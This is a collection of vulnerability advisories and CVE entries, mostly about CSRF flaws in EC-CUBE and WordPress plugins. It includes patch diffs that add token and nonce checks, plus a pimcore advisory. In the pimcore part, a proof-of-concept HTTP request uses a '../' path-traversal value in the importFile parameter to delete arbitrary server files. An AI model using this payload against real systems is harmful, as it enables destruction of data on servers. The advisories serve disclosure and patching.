Cross-site request forgery (CSRF) vulnerability in EC-CUBE plugin 'Mail Magazine Management Plugin' ver4.0.0 to 4.1.1 (for EC-CUBE 4 series) and ver1.0.0 to 1.0.4 (for EC-CUBE 3 series) allows a remote unauthenticated attacker to hijack the authentication of an administrator via a specially crafted page, and Mail Magazine Templates and/or transmitted history information may be deleted unintendedly.

**更新履歴**

2022/02/22 16:00

「脆弱性の概要」に、JVNからの公表内容情報へのリンクを追加

2022/02/21 12:00

プラグイン最新版のリリースに伴い、修正方法1 を更新

謝辞の追加

2022/02/09 13:00

パートナー向けの事前告知としてページ公開

**EC-CUBE メルマガ管理プラグインにおける CSRFの脆弱性のお知らせ**

EC-CUBE メルマガ管理プラグインに脆弱性(緊急度: 低)があることが判明いたしました。

脆弱性そのものは、修正ファイルの反映によりすぐに解決するものです。以下のいずれかの方法により、ご対応をお願いいたします。

*   修正方法1: プラグインのバージョンアップを行う場合
*   修正方法2: 修正差分を確認して適宜反映する場合

皆様にはお手数おかけし誠に申し訳ございません。  
本脆弱性における被害報告は現時点でございませんが、できるだけ速やかにご対応をお願いいたします。

**脆弱性の概要****メルマガ管理プラグインにおける CSRF****危険度:**

低

**不具合が存在するメルマガ管理プラグインのバージョン:**

*   4.0.0〜4.1.1 (EC-CUBE 4系対応)
*   1.0.0〜1.0.4 (EC-CUBE 3系対応)

**詳細:**

管理画面にログインした状態の管理者権限を持つユーザが、細工されたページに誘導され特定のURLにアクセスした場合、意図せず送信履歴やメルマガテンプレートを削除される CSRF脆弱性。

**JVNからの公表内容 (2022/02/22公開)**

JVN#67108459: EC-CUBE 用プラグイン「メルマガ管理プラグイン」におけるクロスサイトリクエストフォージェリの脆弱性

**修正方法1: プラグインのバージョンアップを行う場合**

メルマガ管理プラグインを最新版にバージョンアップしていただくことで、本件の脆弱性は修正されます。  
ご利用の方は、速やかにプラグインのバージョンアップをお願いいたします。

**修正済みプラグインのバージョン**

*   **バージョン 4.1.2 (EC-CUBE 4系対応)**
*   **バージョン 1.0.5 (EC-CUBE 3系対応)**

**修正方法2: 修正差分を確認して適宜反映する場合**

下記のコード差分情報を参照して頂き、必要な箇所に修正を反映してください。

**対象バージョン**

*   **バージョン 4.1.1 (EC-CUBE 4系対応)**
*   **バージョン 1.0.4 (EC-CUBE 3系対応)**

**修正差分****■ バージョン 4.1.1 (EC-CUBE 4系対応)****対象ファイル**

*   /app/Plugin/MailMagazine4/Controller/MailMagazineHistoryController.php
*   /app/Plugin/MailMagazine4/Controller/MailMagazineTemplateController.php
*   /app/Plugin/MailMagazine4/Resource/template/admin/history\_list.twig
*   /app/Plugin/MailMagazine4/Resource/template/admin/template\_list.twig

  

@@ -213,6 +213,7 @@ class MailMagazineHistoryController extends AbstractController

213

213

  public function delete(MailMagazineSendHistory $mailMagazineSendHistory)

214

214

  {

215

215

  try {

216

+ $this->isTokenValid();

216

217

  $id = $mailMagazineSendHistory->getId();

217

218

  $this->mailMagazineSendHistoryRepository->delete($mailMagazineSendHistory);

218

219

  $this->entityManager->flush();

@@ -95,6 +95,7 @@ class MailMagazineTemplateController extends AbstractController

95

95

  // パラメータ$idにマッチするデータが存在するか判定

96

96

  // POSTかつ$idに対応するdtb\_mailmagazine\_templateのレコードがあれば、del\_flg = 1に設定して更新

97

97

  try {

98

+ $this->isTokenValid();

98

99

  $this->mailMagazineTemplateRepository->delete($mailMagazineTemplate);

99

100

  $this->entityManager->flush();

100

101

  $this->addSuccess('admin.delete.complete', 'admin');

@@ -76,6 +76,7 @@ $(function () {

76

76

77

77

  {% block main %}

78

78

  <form name="form1" id="form1" method="post" action="">

79

+ <input type="hidden" name="\_token" value="{{ csrf\_token(constant('Eccube\\\\Common\\\\Constant::TOKEN\_NAME')) }}">

79

80

  <div class="c-outsideBlock\_\_contents mb-5">

80

81

  {% if pagination %}

81

82

  <span class="font-weight-bold ml-2">{{ 'admin.mailmagazine.history.search\_count'|trans({'%count%':pagination.totalItemCount}) }}</span>

@@ -69,6 +69,7 @@

69

69

  {{ 'common.cancel'|trans }}

70

70

  </button>

71

71

  <form action="{{ url('plugin\_mail\_magazine\_template\_delete', { id: Template.id }) }}" method="post" enctype="application/x-www-form-urlencoded">

72

+ <input type="hidden" name="\_token" value="{{ csrf\_token(constant('Eccube\\\\Common\\\\Constant::TOKEN\_NAME')) }}">

72

73

  <button type="submit" class="btn btn-ec-delete">

73

74

  {{ 'common.delete'|trans }}

74

75

  </button>

  

  
**■ バージョン 1.0.4 (EC-CUBE 3系対応)****対象ファイル**

*   /app/Plugin/MailMagazine/Controller/MailMagazineHistoryController.php
*   /app/Plugin/MailMagazine/Controller/MailMagazineTemplateController.php
*   /app/Plugin/MailMagazine/Resource/template/admin/history\_list.twig
*   /app/Plugin/MailMagazine/Resource/template/admin/template\_list.twig

  

@@ -13,6 +13,7 @@ namespace Plugin\\MailMagazine\\Controller;

13

13

14

14

  use Eccube\\Application;

15

15

  use Eccube\\Common\\Constant;

16

+ use Eccube\\Controller\\AbstractController;

16

17

  use Eccube\\Entity\\Master\\Pref;

17

18

  use Knp\\Component\\Pager\\Paginator;

18

19

  use Plugin\\MailMagazine\\Entity\\MailMagazineSendHistory;

@@ -23,7 +24,7 @@ use Symfony\\Component\\HttpFoundation\\Request;

23

24

  use Symfony\\Component\\HttpKernel\\Exception\\BadRequestHttpException;

24

25

  use Doctrine\\Common\\Collections\\ArrayCollection;

25

26

26

\- class MailMagazineHistoryController

27

+ class MailMagazineHistoryController extends AbstractController

27

28

  {

28

29

  public function \_\_construct()

29

30

  {

@@ -234,6 +235,7 @@ class MailMagazineHistoryController

234

235

  \*/

235

236

  public function delete(Application $app, Request $request, $id)

236

237

  {

238

+ $this->isTokenValid($app);

237

239

  // POSTかどうか判定

238

240

  if ('POST' !== $request->getMethod()) {

239

241

  throw new BadRequestHttpException();

@@ -12,12 +12,13 @@

12

12

  namespace Plugin\\MailMagazine\\Controller;

13

13

14

14

  use Eccube\\Application;

15

+ use Eccube\\Controller\\AbstractController;

15

16

  use Plugin\\MailMagazine\\Entity\\MailMagazineTemplate;

16

17

  use Plugin\\MailMagazine\\Repository\\MailMagazineTemplateRepository;

17

18

  use Symfony\\Component\\HttpFoundation\\Request;

18

19

  use Symfony\\Component\\HttpKernel\\Exception\\BadRequestHttpException;

19

20

20

\- class MailMagazineTemplateController

21

+ class MailMagazineTemplateController extends AbstractController

21

22

  {

22

23

  public function \_\_construct()

23

24

  {

@@ -85,6 +86,7 @@ class MailMagazineTemplateController

85

86

  // POSTかどうか判定

86

87

  // パラメータ$idにマッチするデータが存在するか判定

87

88

  // POSTかつ$idに対応するdtb\_mailmagazine\_templateのレコードがあれば、del\_flg = 1に設定して更新

89

+ $this->isTokenValid($app);

88

90

  if ('POST' === $request->getMethod()) {

89

91

  // idがからの場合はメルマガテンプレート一覧へリダイレクト

90

92

  if (is\_null($id) || strlen($id) == 0) {

@@ -84,6 +84,7 @@ $(function () {

84

84

  {% block main %}

85

85

  <form name="form1" id="form1" method="post" action="">

86

86

87

+ <input type="hidden" name="{{ constant('Eccube\\\\Common\\\\Constant::TOKEN\_NAME') }}" value="{{ csrf\_token(constant('Eccube\\\\Common\\\\Constant::TOKEN\_NAME')) }}">

87

88

  {% if pagination %}

88

89

  <div class="row">

89

90

  <div class="col-md-12">

@@ -46,6 +46,7 @@ function changeAction(action) {

46

46

  </div>

47

47

  <div class="box-body">

48

48

  <form name="form1" id="form1" method="post" action="">

49

+ <input type="hidden" name="{{ constant('Eccube\\\\Common\\\\Constant::TOKEN\_NAME') }}" value="{{ csrf\_token(constant('Eccube\\\\Common\\\\Constant::TOKEN\_NAME')) }}">

49

50

  <div class="table\_list">

50

51

  <div class="table-responsive with-border">

51

52

  <table class="table table-striped">

**問い合わせ先**

本脆弱性に関するお問合せ：

EC-CUBE 運営チーム  
MAIL: support@ec-cube.net

**謝辞**

本脆弱性は、三井物産セキュアディレクション株式会社 山本健太様よりご報告いただきました。  
この場をお借りして、厚く御礼申し上げます。

CVE-2022-21179: EC-CUBE メルマガ管理プラグインにおける CSRFの脆弱性 (JVN#67108459)

Path Traversal in GitHub repository pimcore/pimcore prior to 10.3.2.

**Description**

The application doesn't perform a check/filter against the value of "importFile" parameter at endpoint "/admin/translation/import". After the API is executed, PHP unlink function will proceed to delete the file.

**Proof of Concept**

*   Step 1: Login as admin at https://10.x-dev.pimcore.fun/admin.
*   Step 2: Using burpsuite to proxy request. Go to Settings -> Admin Translations -> Import & Merge CSV
*   Step 3: Edit value of importFile in request call to /admin/translation/import

    POST /admin/translation/import?merge=2 HTTP/1.1
    Host: 10.x-dev.pimcore.fun
    Cookie: pimcore_admin_sid=1; _pc_tss=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2NDQ0ODI4MjMuODk3MTExLCJwdGciOnsiX20iOjEsIl9jIjoxNjQ0NDgxMjAxLCJfdSI6MTY0NDQ4MjgyMywidmk6c3J1IjpbN119LCJleHAiOjE2NDQ0ODQ2MjN9.0Ezd501szQiJryBsTcmEajyE0cKw3Jy0D7vnaIi0f7M; _pc_tvs=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2NDQ0ODI4MjMuODk3MjE4LCJwdGciOnsiY21mOnNnIjp7Ijg2MCI6MX0sIl9jIjoxNjQ0NDgxMjAyLCJfdSI6MTY0NDQ4MTIwMn0sImV4cCI6MTY3NjAxODgyM30.QVPovPchi8Amu7U6HfloyPzaqWM9raWqTr8WyaODiHU; _pc_vis=bdd4fff7d63cd197; _pc_ses=1644481631796; _ga=GA1.4.1223340938.1644481632; _gid=GA1.4.1727336840.1644481632; PHPSESSID=8ec8b25fc8744112040d525dc3a0cff0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
    Accept: */*
    Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: https://10.x-dev.pimcore.fun/admin/?_dc=1644481466&perspective=
    X-Pimcore-Csrf-Token: 3940b07522d199209cfd8b6083f0959e0f907449
    X-Pimcore-Extjs-Version-Major: 7
    X-Pimcore-Extjs-Version-Minor: 0
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 263
    Origin: https://10.x-dev.pimcore.fun
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Te: trailers
    Connection: close
    
    importFile=../../../../../../../../../var/www/html/vendor/pimcore/pimcore/lib/Model/AbstractModel.php&csvSettings={"delimiter":":","escapechar":"\\","lineterminator":"\n","quotechar":"\""}&domain=admin&delimiter=%3a&escapechar=%5C&lineterminator=%0a&quotechar=%22
    

*   Step 4: Logout and go to https://10.x-dev.pimcore.fun/admin, you will see error "Failed opening '/var/www/html/vendor/composer/../pimcore/pimcore/lib/Model/AbstractModel.php' for inclusion". Sorry for my mistake, can you revert https://10.x-dev.pimcore.fun.

*   PoC:

https://drive.google.com/file/d/17EtF8I3ChKL14uDxaelBa0GLeHq6APjy

https://drive.google.com/file/d/1JnffQheSMgnKeAaQjYQxMHxDwCS3UA80

**Root-cause:**

*   Path traversal: https://github.com/pimcore/pimcore/blob/master/bundles/AdminBundle/Controller/Admin/TranslationController.php#L71
    
*   File delete: https://github.com/pimcore/pimcore/blob/master/bundles/AdminBundle/Controller/Admin/TranslationController.php#L95
    

**Impact**

Attacker can delete any file on the server (successful file deletion depends on the current user is running web service)

**Occurrences**

CVE-2022-0665: Path Traversal in pimcore

Cross-Site Request Forgery (CSRF) vulnerability leading to event deletion was discovered in Spiffy Calendar WordPress plugin (versions <= 4.9.0).

CVE-2022-25599: Spiffy Calendar

Cross-Site Request Forgery (CSRF) vulnerability leading to plugin Settings Update discovered in WP Content Copy Protection & No Right Click WordPress plugin (versions <= 3.4.4).

**wp-content-copy-protector**

**Software**

**WP Content Copy Protection & No Right Click**

**Vulnerable Versions**

**<= 3.4.4**

**Fixed in version**

**3.4.5**

**CVE**

**CVE-2022-23983**

**References**

**Credits**

**Classification**

**Cross Site Request Forgery (CSRF)**

**OWASP Top 10**

**A8: Cross Site Request Forgery (CSRF)**

**Disclosure Date**

**2022-02-16**

**CVSS 3.0 score**

**Are your websites subject to this vulnerability?**

**Details**

**Cross-Site Request Forgery (CSRF) vulnerability discovered in WordPress WP Content Copy Protection & No Right Click plugin (versions <= 3.4.4) by Muhammad Daffa.**

**Solution**

**Update the WordPress WP Content Copy Protection & No Right Click plugin to the latest available version (at least 3.4.5).**

**Found a vulnerability that puts your sites at risk?**

**Found a vulnerability? Help us secure the web and join our community of ethical hackers.**

**Are you the developer of this software? Hire our researchers for a thorough security audit.**

CVE-2022-23983: WordPress WP Content Copy Protection & No Right Click plugin <= 3.4.4 - Cross-Site Request Forgery (CSRF) leads to Settings Update vulnerability - Patchstack

The Coming soon and Maintenance mode WordPress plugin before 3.6.8 does not have authorisation and CSRF checks in its coming_soon_send_mail AJAX action, allowing any authenticated users, with a role as low as subscriber to send arbitrary emails to all subscribed users

CVE-2022-0164

The Float menu WordPress plugin before 4.3.1 does not have CSRF check in place when deleting menu, which could allow attackers to make a logged in admin delete them via a CSRF attack

**Legend:**

Unmodified

Added

Removed

*   **float-menu/trunk/README.txt**
    
    r2643285
    
    r2661431
    
     
    
    6
    
    6
    
    Tested up to: 5.8
    
    7
    
    7
    
    Requires PHP: 5.6
    
    8
    
     
    
    Stable tag: 4.3
    
     
    
    8
    
    Stable tag: 4.3.1
    
    9
    
    9
    
    License: GPLv2 or later
    
    10
    
    10
    
    License URI: http://www.gnu.org/licenses/gpl-2.0.html
    
    …
    
    …
    
     
    
    104
    
    104
    
    105
    
    105
    
    \== Changelog ==
    
     
    
    106
    
    \= 4.3.1 =
    
     
    
    107
    
    Fixed: security update
    
     
    
    108
    
    106
    
    109
    
    \= 4.3 =
    
    107
    
    110
    
    \* Added: added the ability to add a shortcode to pages
    
*   **float-menu/trunk/admin/class-list-table.php**
    
    r2612923
    
    r2661431
    
     
    
    114
    
    114
    
                'duplicate' => '<a href="' . esc\_url( $duplicate\_url ) . '" style="color:green;">' . esc\_attr\_\_( 'Duplicate', $this->plugin\['text'\] )
    
    115
    
    115
    
                               . '</a>',
    
    116
    
     
    
                'delete'    => '<a href="' . esc\_url( $delete\_url ) . '" style="color:red;">' . esc\_attr\_\_( 'Delete', $this->plugin\['text'\] ) . '</a>',
    
     
    
    116
    
                'delete'    => '<a href="' . esc\_url( wp\_nonce\_url($delete\_url, $slug . '\_nonce' ) ) . '" style="color:red;">' . esc\_attr\_\_( 'Delete', $this->plugin\['text'\] ) . '</a>',
    
    117
    
    117
    
            );
    
    118
    
    118
    
*   **float-menu/trunk/admin/page-main.php**
    
    r2612923
    
    r2661431
    
     
    
    24
    
    24
    
    } elseif ( $info == 'delete' ) {
    
    25
    
    25
    
        $delid = absint( $\_GET\['did'\] );
    
    26
    
     
    
        $wpdb->delete( $data, \[ 'id' => $delid \], \[ '%d' \] );
    
    27
    
     
    
        echo '<div class="updated" id="message"><p><strong>' . esc\_attr\_\_( 'Item Deleted', $this->plugin\['text'\] ) . '</strong>.</p></div>';
    
     
    
    26
    
        if ( ! empty( $\_GET\['\_wpnonce'\] ) && wp\_verify\_nonce( $\_GET\['\_wpnonce'\], $this->plugin\['slug'\] . '\_nonce' ) ) {
    
     
    
    27
    
            $wpdb->delete( $data, \[ 'id' => $delid \], \[ '%d' \] );
    
     
    
    28
    
            echo '<div class="updated" id="message"><p><strong>' . esc\_attr\_\_( 'Item Deleted', $this->plugin\['text'\] ) . '</strong>.</p></div>';
    
     
    
    29
    
        }
    
     
    
    30
    
    28
    
    31
    
    }
    
    29
    
    32
    
*   **float-menu/trunk/float-menu.php**
    
    r2643285
    
    r2661431
    
     
    
    4
    
    4
    
     \* Plugin URI:        https://wordpress.org/plugins/float-menu/
    
    5
    
    5
    
     \* Description:       Easily create floating menus of varying complexity
    
    6
    
     
    
     \* Version:           4.3
    
     
    
    6
    
     \* Version:           4.3.1
    
    7
    
    7
    
     \* Author:            Wow-Company
    
    8
    
    8
    
     \* Author URI:        https://wow-estore.com
    
    …
    
    …
    
     
    
    57
    
    57
    
                            'prefix'    => self::PREF, // Prefix for database
    
    58
    
    58
    
                            'text'      => 'float-menu',    // Text domain for translate files
    
    59
    
     
    
                            'version'   => '4.3', // Current version of the plugin
    
     
    
    59
    
                            'version'   => '4.3.1', // Current version of the plugin
    
    60
    
    60
    
                            'file'      => \_\_FILE\_\_, // Main file of the plugin
    
    61
    
    61
    
                            'slug'      => dirname( plugin\_basename( \_\_FILE\_\_ ) ), // Name of the plugin folder
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2022-0313: Changeset 2661431 – WordPress Plugin Repository

The Duplicate Page or Post WordPress plugin before 1.5.1 does not have any authorisation and has a flawed CSRF check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing any authenticated users, such as subscriber to call it and change the plugin's settings, or perform such attack via CSRF. Furthermore, due to the lack of escaping, this could lead to Stored Cross-Site Scripting issues

CVE-2021-25075

The Coming soon and Maintenance mode WordPress plugin before 3.6.8 does not have CSRF check in its coming_soon_send_mail AJAX action, allowing attackers to make logged in admin to send arbitrary emails to all subscribed users via a CSRF attack

Timestamp:

01/18/2022 04:16:28 PM (5 weeks ago)

wpdevart

Message:

new version  

Location:

coming-soon-page/trunk

Files:

  

*   coming\_soon.php (1 diff)
*   includes/admin\_menu.php (5 diffs)
*   readme.txt (2 diffs)

**Legend:**

Unmodified

Added

Removed

*   **coming-soon-page/trunk/coming\_soon.php**
    
    r2655973
    
    r2659455
    
     
    
    6
    
    6
    
     \* Author URI: https://wpdevart.com
    
    7
    
    7
    
     \* Description: Coming soon and Maintenance mode plugin is awesome tool to show your users that you are working on your website to make it better. Our coming soon plugin is the best way to create better coming soon page. 
    
    8
    
     
    
     \* Version: 3.6.7
    
     
    
    8
    
     \* Version: 3.6.8
    
    9
    
    9
    
     \* Author: wpdevart
    
    10
    
    10
    
     \* License: GPLv3 http://www.gnu.org/licenses/gpl-3.0.html
    
*   **coming-soon-page/trunk/includes/admin\_menu.php**
    
    r2655973
    
    r2659455
    
     
    
    1862
    
    1862
    
            if ($mailing\_lists == NULL)
    
    1863
    
    1863
    
                $mailing\_lists = array();
    
    1864
    
     
    
            if (isset($\_GET\['id'\]) && isset($\_GET\['task'\]) && $\_GET\['task'\] == 'remove\_user') {
    
     
    
    1864
    
            if (isset($\_GET\['id'\]) && isset($\_GET\['task'\]) && $\_GET\['task'\] == 'remove\_user' && wp\_verify\_nonce($\_POST\['wpda\_coming\_soon\_mail\_nonce'\], 'wpda\_coming\_soon\_mail\_nonce')) {
    
    1865
    
    1865
    
                $get\_id = intval($\_GET\['id'\]);
    
    1866
    
    1866
    
                unset($mailing\_lists\[$get\_id\]);
    
    …
    
    …
    
     
    
    1868
    
    1868
    
            }
    
    1869
    
    1869
    
        ?>
    
    1870
    
     
    
    1871
    
    1870
    
            <div class="wpdevart\_plugins\_header div-for-clear">
    
    1872
    
    1871
    
                <div class="wpdevart\_plugins\_get\_pro div-for-clear">
    
    …
    
    …
    
     
    
    1892
    
    1891
    
                <br /><br />
    
    1893
    
    1892
    
                <span class="error\_massage mailing\_list"></span>
    
     
    
    1893
    
                <?php wp\_nonce\_field('wpda\_coming\_soon\_mail\_nonce', 'wpda\_coming\_soon\_mail\_nonce'); ?>
    
    1894
    
    1894
    
            </form>
    
    1895
    
    1895
    
            <h2>The list of the subscribed users</h2> <?php $this->generete\_subscriber\_table\_lists($mailing\_lists); ?><h2>The list of the Subscribed users emails</h2><p><span style="color:#7052fb;font-weight:bold;">You can copy the emails list from the below and send emails using Gmail or other email services.</span></p><textarea readonly style="min-height:200px;width:95%">
    
    …
    
    …
    
     
    
    1911
    
    1911
    
                                massage\_from\_name: jQuery('#massage\_from\_name').val(),
    
    1912
    
    1912
    
                                massage\_description: jQuery('#massage\_description').val(),
    
    1913
    
     
    
                                massage\_title: jQuery('#massage\_title').val()
    
     
    
    1913
    
                                massage\_title: jQuery('#massage\_title').val(),
    
     
    
    1914
    
                                wpda\_coming\_soon\_mail\_nonce:jQuery('#wpda\_coming\_soon\_mail\_nonce').val()
    
    1914
    
    1915
    
                            },
    
    1915
    
    1916
    
                        }).done(function(date) {
    
    …
    
    …
    
     
    
    1969
    
    1970
    
                die();
    
    1970
    
    1971
    
            }
    
     
    
    1972
    
            if(wp\_verify\_nonce($\_POST\['wpda\_coming\_soon\_mail\_nonce'\], 'wpda\_coming\_soon\_mail\_nonce') === false){
    
     
    
    1973
    
                echo esc\_html($this->text\_parametrs\['authorize\_problem'\]);
    
     
    
    1974
    
                die();
    
     
    
    1975
    
            }
    
     
    
    1976
    
    1971
    
    1977
    
            $mailing\_lists = json\_decode(stripslashes(get\_option('users\_mailer', '')), true);
    
    1972
    
    1978
    
            if ($mailing\_lists == NULL)
    
*   **coming-soon-page/trunk/readme.txt**
    
    r2655973
    
    r2659455
    
     
    
    5
    
    5
    
    Requires at least: 3.4.0
    
    6
    
    6
    
    Tested up to: 5.8.3
    
    7
    
     
    
    Stable tag: 3.6.7
    
     
    
    7
    
    Stable tag: 3.6.8
    
    8
    
    8
    
    License: GPLv3
    
    9
    
    9
    
    License URI: http://www.gnu.org/licenses/gpl-3.0.html
    
    …
    
    …
    
     
    
    781
    
    781
    
    \*  Bug fixed.
    
    782
    
    782
    
     
    
    783
    
    \= 3.6.8 ==
    
     
    
    784
    
     
    
    785
    
    \*  Bug fixed!
    
     
    
    786
    
    783
    
    787
    
    \==Step by step guide==
    
    784
    
    788
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2022-0199: Changeset 2659455 – WordPress Plugin Repository

The AnyComment WordPress plugin before 0.2.18 does not have CSRF checks in the Import and Revert HyperComments features, allowing attackers to make logged in admin perform such actions via a CSRF attack

Tag

#csrf